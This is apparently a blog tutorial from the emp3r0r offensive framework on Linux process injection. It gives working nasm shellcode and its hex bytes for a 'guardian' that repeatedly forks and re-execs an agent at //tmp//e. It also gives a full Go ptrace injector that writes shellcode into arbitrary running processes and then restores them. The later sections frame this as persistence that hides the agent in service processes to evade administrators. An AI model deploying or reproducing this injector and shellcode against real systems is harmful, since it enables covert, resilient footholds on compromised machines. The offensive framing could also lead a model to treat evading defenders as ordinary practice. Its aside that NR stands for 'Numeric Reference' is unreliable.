Process Injection In Linux
Background
The techniques covered in this article are part of the emp3r0r project.
Linux has something that other platforms don't: procfs. As Unix people always like to say, "everything is a file". From /proc/pid/maps we can read the process's memory mappings, and with /proc/pid/mem we can even modify its memory with ease (it's almost the same as modifying an actual file).
Theoretically speaking, we are able to inject code into arbitrary processes with just procfs and dd. There is even a PoC project if you google it.
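To make the procfs part concrete, here is a minimal sketch (not taken from emp3r0r) that lists the executable mappings of the current process by parsing /proc/self/maps. The Mapping type and the parseMapsLine helper are names I made up for illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strconv"
	"strings"
)

// Mapping is one line of /proc/<pid>/maps (hypothetical type for this sketch).
type Mapping struct {
	Start, End uint64
	Perms      string
	Path       string
}

// parseMapsLine parses a line such as
// "00400000-0040b000 r-xp 00000000 08:01 123 /bin/cat".
func parseMapsLine(line string) (Mapping, error) {
	fields := strings.Fields(line)
	if len(fields) < 5 {
		return Mapping{}, fmt.Errorf("malformed maps line: %q", line)
	}
	bounds := strings.SplitN(fields[0], "-", 2)
	if len(bounds) != 2 {
		return Mapping{}, fmt.Errorf("malformed address range: %q", fields[0])
	}
	start, err := strconv.ParseUint(bounds[0], 16, 64)
	if err != nil {
		return Mapping{}, err
	}
	end, err := strconv.ParseUint(bounds[1], 16, 64)
	if err != nil {
		return Mapping{}, err
	}
	m := Mapping{Start: start, End: end, Perms: fields[1]}
	if len(fields) >= 6 {
		// The path column is optional (anonymous mappings have none).
		m.Path = strings.Join(fields[5:], " ")
	}
	return m, nil
}

func main() {
	f, err := os.Open("/proc/self/maps")
	if err != nil {
		fmt.Println("open:", err)
		return
	}
	defer f.Close()

	sc := bufio.NewScanner(f)
	for sc.Scan() {
		m, err := parseMapsLine(sc.Text())
		if err != nil {
			continue
		}
		// Only show executable regions, which is where code lives.
		if strings.Contains(m.Perms, "x") {
			fmt.Printf("%x-%x %s %s\n", m.Start, m.End, m.Perms, m.Path)
		}
	}
}
```

Replace self with a PID to look at another process, provided you have permission to read its maps file.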
But since Linux provides an interface for tampering with processes, we will just use it where possible.
Unlike Windows, Linux has one and only one API for process tampering: ptrace.
Yeah, it's ptrace.
Then how do we inject code with ptrace?
- PTRACE_ATTACH to the target process, thus taking control of it
- PTRACE_POKETEXT your shellcode at where RIP is pointing, after backing up the code it overwrites
- Resume the process
- The shellcode gets executed until the int 3 trap; the process gets trapped and gives control back to us
- We restore the code, along with the registers
- The process executes on, like nothing has ever happened
Restore injected process
It looks easy, doesn't it?
But it's not. The process may or may not recover; it all depends on your shellcode. Just restoring the code and registers is not enough, as your shellcode has messed up the stack as well.
And you wouldn't want the shellcode to block the main thread. In that case we wouldn't be talking about process recovery anymore, we would be talking about execve.
Yes, some shellcode calls execve in the current process, effectively making the original process gone for good.
Therefore, we will just fork a new child and put our shellcode in it.
You can clone as well, it just doesn't make much difference.
Linux x64 shellcode 101
It's actually a 101 for myself, as I have never written any shellcode before.
With DuckDuckGo and some help from the AOSC Linux folks, I was able to roll out my own "hello world" shellcode.
It's much more than a "hello world", it's a guardian shellcode.
How
What language
Of course you write assembly to get your shellcode, that's what it is.
But with the help of a C compiler, the job can be done more quickly, as recommended by a friend:
As you can see in the code, char buf[] takes care of our "Hello World\n" string data, so we don't need to worry about stack allocation anymore.
This article, however, will use the traditional assembly way, as I want to learn it.
What editor
I would use vim.
And nasm as the assembler.
nasm
I wouldn't use section .data as it brings more \0 bytes.
A nasm assembly skeleton targeting x86_64:
BITS 64
global _start
section .text
_start:
...your code...
global _start is like main: it marks the entry point for the linker. BITS 64 tells nasm this is 64-bit assembly.
hex string
You have to assemble your code into raw bytes:
❯ nasm yourshellcode.asm -o shellcode.bin
And raw bytes to hex string:
❯ xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g'
\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x7f\x5e\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x74\x2c\x48\x31\xff\x48\x89\xc7\x48\x31\xf6\x48\x31\xd2\x4d\x31\xd2\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\xb0\x23\x6a\x0a\x6a\x14\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe2\xc4\x48\x31\xd2\x52\x48\x31\xc0\x48\xbf\x2f\x2f\x74\x6d\x70\x2f\x2f\x65\x57\x54\x5f\x48\x89\xe7\x52\x57\x48\x89\xe6\x6a\x3b\x58\x99\x0f\x05\xcd\x03
With rax2:
❯ rax2 -S < shellcode.bin
4831c04831ffb0390f054883f8007f5e4831c04831ffb0390f054883f800742c4831ff4889c74831f64831d24d31d24831c0b03d0f054831c0b0236a0a6a144889e74831f64831d20f05e2c44831d2524831c048bf2f2f746d702f2f6557545f4889e752574889e66a3b58990f05cd03
rax2 is part of radare2.
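If you would rather not depend on xxd or rax2, the same conversion is easy to sketch in Go. This is only an illustration: toEscaped and fromHexString are hypothetical helper names. fromHexString accepts the "\x48", "0x48," and plain "48" spellings seen above.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"strings"
)

// toEscaped renders raw bytes as a C-style "\x48\x31..." string.
func toEscaped(raw []byte) string {
	var b strings.Builder
	for _, c := range raw {
		fmt.Fprintf(&b, "\\x%02x", c)
	}
	return b.String()
}

// fromHexString strips the common decorations ("\x", "0x", commas,
// whitespace) and decodes what is left as plain hex.
func fromHexString(s string) ([]byte, error) {
	r := strings.NewReplacer("\\x", "", "0x", "", ",", "", " ", "", "\n", "")
	return hex.DecodeString(r.Replace(s))
}

func main() {
	raw := []byte{0x48, 0x31, 0xc0, 0x0f, 0x05} // xor rax, rax; syscall
	esc := toEscaped(raw)
	fmt.Println(esc)

	back, err := fromHexString(esc)
	fmt.Println(hex.EncodeToString(back), err)
}
```

In a real tool you would read shellcode.bin with os.ReadFile and feed the bytes to toEscaped.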
syscall
syscall NR
Why is it prefixed NR? I looked it up and it seems to be an abbreviation of Numeric Reference.
You give Linux an NR to let it know which syscall you are calling.
Here's a complete syscall table for Linux.
Note that syscall numbers may differ between architectures.
We care about x86_64 only. BTW, why would you even consider writing x86 assembly for Linux? It's 2021 guys, x86 has been deprecated for like ten years!
Calling convention
Calling a syscall is no different from calling other functions, it's just that we have to do it in assembly, without the C compiler's help.
That means we need to set up its arguments manually. It's not easy for certain syscalls, but the procedure is always the same:
For x86_64, you put the syscall NR into RAX and the arguments into RDI, RSI, RDX, R10, R8 and R9, then execute the syscall instruction (the 64-bit successor of the legacy int 0x80 interface, which uses different registers and syscall numbers). RAX holds the return value after it's done, and the kernel also clobbers RCX and R11.
Some syscall arguments are pointers: you need to pass addresses (instead of data) to them.
A guardian shellcode
This shellcode is part of emp3r0r.
Some tips:
- When a pointer is required, you push your data onto the stack, then pass the RSP value
- push takes no more than 4 bytes of immediate number; if you need to push more than 4 bytes, store them in a register and push the register instead
- Terminate the char array and string array with \0, which you push first
- Don't use reserved words in label names, for example, wait
If you were not using nasm, these might not be what you need to see.
And:
- Why wait? Because we end up with zombie children if we don't
- Why fork twice? Because execve replaces the current process with a new image
- Why sleep? Because we don't want the CPU to fly
- Why int 0x3? Because we have to pause (trap) the shellcode in order to restore the process
BITS 64
section .text
global _start
_start:
    ;; fork
    xor rax, rax
    xor rdi, rdi
    mov al, 0x39        ; syscall fork
    syscall
    cmp rax, 0x0        ; check return value
    jg pause            ; int3 if in parent
watchdog:
    ;; fork to exec agent
    xor rax, rax
    xor rdi, rdi
    mov al, 0x39        ; syscall fork
    syscall
    cmp rax, 0x0        ; check return value
    je exec             ; exec if in child
wait4zombie:
    ;; wait to clean up zombies
    xor rdi, rdi
    mov rdi, rax        ; pid returned by fork
    xor rsi, rsi
    xor rdx, rdx
    xor r10, r10
    xor rax, rax
    mov al, 0x3d        ; syscall wait4
    syscall
sleep:
    ;; sleep
    xor rax, rax
    mov al, 0x23        ; syscall nanosleep
    push 10             ; tv_nsec = 10
    push 20             ; tv_sec = 20
    mov rdi, rsp        ; pointer to struct timespec
    xor rsi, rsi
    xor rdx, rdx
    syscall
    loop watchdog       ; jumps back while RCX != 0; syscall leaves the return address in RCX
exec:
    ;; char **envp (NULL)
    xor rdx, rdx
    push rdx            ; '\0' terminating the path string
    ;; char *filename
    xor rax, rax
    mov rdi, 0x652f2f706d742f2f ; path to the executable
    push rdi            ; save to stack
    push rsp
    pop rdi
    mov rdi, rsp        ; you can delete this as it does nothing
    ;; char **argv
    push rdx            ; NULL terminating the argv array
    push rdi
    mov rsi, rsp        ; rsi = argv (points at argv[0])
    push 0x3b           ; syscall execve
    pop rax             ; ready to call
    cdq                 ; zero RDX, since EAX is positive
    syscall
pause:
    ;; trap
    int 0x3
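The magic number in mov rdi, 0x652f2f706d742f2f is just the path "//tmp//e" stored little-endian; the doubled slashes pad it to exactly 8 bytes so the immediate contains no \0. A small sketch for packing and unpacking such immediates (packPath8 and unpackPath8 are hypothetical helper names):

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// packPath8 packs an exactly-8-byte string into the 64-bit immediate
// you would use with `mov rdi, imm64` before pushing it.
func packPath8(p string) (uint64, error) {
	if len(p) != 8 {
		return 0, fmt.Errorf("need exactly 8 bytes, got %d", len(p))
	}
	return binary.LittleEndian.Uint64([]byte(p)), nil
}

// unpackPath8 turns such an immediate back into the string it encodes.
func unpackPath8(v uint64) string {
	b := make([]byte, 8)
	binary.LittleEndian.PutUint64(b, v)
	return string(b)
}

func main() {
	fmt.Printf("%q\n", unpackPath8(0x652f2f706d742f2f))

	v, err := packPath8("//tmp//e")
	fmt.Printf("0x%x %v\n", v, err)
}
```

Paths longer than 8 bytes need several push instructions, pushed in reverse order so the string reads correctly from RSP upwards.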
Weaponize it
Inject shellcode
emp3r0r automatically injects the guardian shellcode into common processes:
Now we have a bunch of guardian code running inside the target system's service processes. It would be a disaster for system admins, as they will have a hard time finding where the hell our guardian angel hides until they reboot the whole system.
If you are interested, write your own shellcode to play with.
So how do we inject? Here's emp3r0r's approach:
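// Needs these imports: encoding/hex, fmt, log, os, os/exec, runtime, strconv, strings, syscall.
// RandInt is a helper defined elsewhere in the project.
// Injector injects shellcode into an arbitrary running process.
// The target process will be restored after the shellcode has done its job.
func Injector(shellcode *string, pid int) error {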
// format
*shellcode = strings.Replace(*shellcode, ",", "", -1)
*shellcode = strings.Replace(*shellcode, "0x", "", -1)
*shellcode = strings.Replace(*shellcode, "\\x", "", -1)
// decode hex shellcode string
sc, err := hex.DecodeString(*shellcode)
if err != nil {
return fmt.Errorf("Decode shellcode: %v", err)
}
// inject to an existing process or start a new one
// check /proc/sys/kernel/yama/ptrace_scope if you cant inject to existing processes
if pid == 0 {
// start a child process to inject shellcode into
sec := strconv.Itoa(RandInt(10, 30))
child := exec.Command("sleep", sec)
child.SysProcAttr = &syscall.SysProcAttr{Ptrace: true}
err = child.Start()
if err != nil {
return fmt.Errorf("Start `sleep %s`: %v", sec, err)
}
pid = child.Process.Pid
// attach
err = child.Wait() // TRAP the child
if err != nil {
log.Printf("child process wait: %v", err)
}
log.Printf("Injector (%d): attached to child process (%d)", os.Getpid(), pid)
} else {
// attach to an existing process
proc, err := os.FindProcess(pid)
if err != nil {
return fmt.Errorf("%d does not exist: %v", pid, err)
}
pid = proc.Pid
// https://github.com/golang/go/issues/43685
runtime.LockOSThread()
defer runtime.UnlockOSThread()
err = syscall.PtraceAttach(pid)
if err != nil {
return fmt.Errorf("ptrace attach: %v", err)
}
_, err = proc.Wait()
if err != nil {
return fmt.Errorf("Wait %d: %v", pid, err)
}
log.Printf("Injector (%d): attached to %d", os.Getpid(), pid)
}
// read RIP
origRegs := &syscall.PtraceRegs{}
err = syscall.PtraceGetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("my pid is %d, reading regs from %d: %v", os.Getpid(), pid, err)
}
origRip := origRegs.Rip
log.Printf("Injector: got RIP (0x%x) of %d", origRip, pid)
// save current code for restoring later
origCode := make([]byte, len(sc))
n, err := syscall.PtracePeekText(pid, uintptr(origRip), origCode)
if err != nil {
return fmt.Errorf("PEEK: 0x%x: %v", origRip, err)
}
log.Printf("Peeked %d bytes of original code: %x at RIP (0x%x)", n, origCode, origRip)
// write shellcode to .text section, where RIP is pointing at
data := sc
n, err = syscall.PtracePokeText(pid, uintptr(origRip), data)
if err != nil {
return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err)
}
log.Printf("Injected %d bytes at RIP (0x%x)", n, origRip)
// peek: see if shellcode has got injected
peekWord := make([]byte, len(data))
n, err = syscall.PtracePeekText(pid, uintptr(origRip), peekWord)
if err != nil {
return fmt.Errorf("PEEK: 0x%x: %v", origRip, err)
}
log.Printf("Peeked %d bytes of shellcode: %x at RIP (0x%x)", n, peekWord, origRip)
// continue and wait
err = syscall.PtraceCont(pid, 0)
if err != nil {
return fmt.Errorf("Continue: %v", err)
}
var ws syscall.WaitStatus
_, err = syscall.Wait4(pid, &ws, 0, nil)
if err != nil {
return fmt.Errorf("continue: wait4: %v", err)
}
// what happened to our child?
switch {
case ws.Continued():
return nil
case ws.CoreDump():
err = syscall.PtraceGetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("read regs from %d: %v", pid, err)
}
return fmt.Errorf("continue: core dumped: RIP at 0x%x", origRegs.Rip)
case ws.Exited():
return nil
case ws.Signaled():
err = syscall.PtraceGetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("read regs from %d: %v", pid, err)
}
return fmt.Errorf("continue: signaled (%s): RIP at 0x%x", ws.Signal(), origRegs.Rip)
case ws.Stopped():
stoppedRegs := &syscall.PtraceRegs{}
err = syscall.PtraceGetRegs(pid, stoppedRegs)
if err != nil {
return fmt.Errorf("read regs from %d: %v", pid, err)
}
log.Printf("Continue: stopped (%s): RIP at 0x%x", ws.StopSignal().String(), stoppedRegs.Rip)
// restore registers
err = syscall.PtraceSetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("Restoring process: set regs: %v", err)
}
// breakpoint hit, restore the process
n, err = syscall.PtracePokeText(pid, uintptr(origRip), origCode)
if err != nil {
return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err)
}
log.Printf("Restored %d bytes at origRip (0x%x)", n, origRip)
// let it run
err = syscall.PtraceDetach(pid)
if err != nil {
return fmt.Errorf("Continue detach: %v", err)
}
log.Printf("%d will continue to run", pid)
return nil
default:
err = syscall.PtraceGetRegs(pid, origRegs)
if err != nil {
return fmt.Errorf("read regs from %d: %v", pid, err)
}
log.Printf("continue: RIP at 0x%x", origRegs.Rip)
}
return nil
}
This is probably the first ptrace-based Linux process injection tool written in pure Go.
Several things to notice if you want to build your own:
- Go's syscall wrappers are undocumented
- ptrace has to stay in one thread, otherwise you lose your tracee; this is a Linux/Unix issue
- But it's also a Go issue, as Go loves using goroutines. I had to put runtime.LockOSThread() before syscall.Ptrace* to solve this issue
I would like to give Go a medal for its PTRACE_POKETEXT and PTRACE_PEEKTEXT wrappers, because not having to peek/poke one word at a time is such a relief for lazy users like me.
The key point here is int 0x3: it causes the current process to pause (trap), giving its tracer full control, and that's when we start to restore the original process.
Get persistence with shellcode
Injecting the guardian shellcode into some important service processes is a better way to get "persistence".
It's hard to get caught, and easy to resurrect our agent.
This is a simple sleep demo program, which we will inject into.
/*
 * This program is used to check shellcode injection
 */
#include <stdio.h>
#include <time.h>
#include <unistd.h>
int main(int argc, char* argv[])
{
    time_t rawtime;
    struct tm* timeinfo;
    while (1) {
        sleep(1);
        time(&rawtime);
        timeinfo = localtime(&rawtime);
        /* asctime() already appends a newline to the timestamp */
        printf("%s: sleeping\n", asctime(timeinfo));
    }
    return 0;
}
The sleep program sleeps on, with a new child process to guard our agent.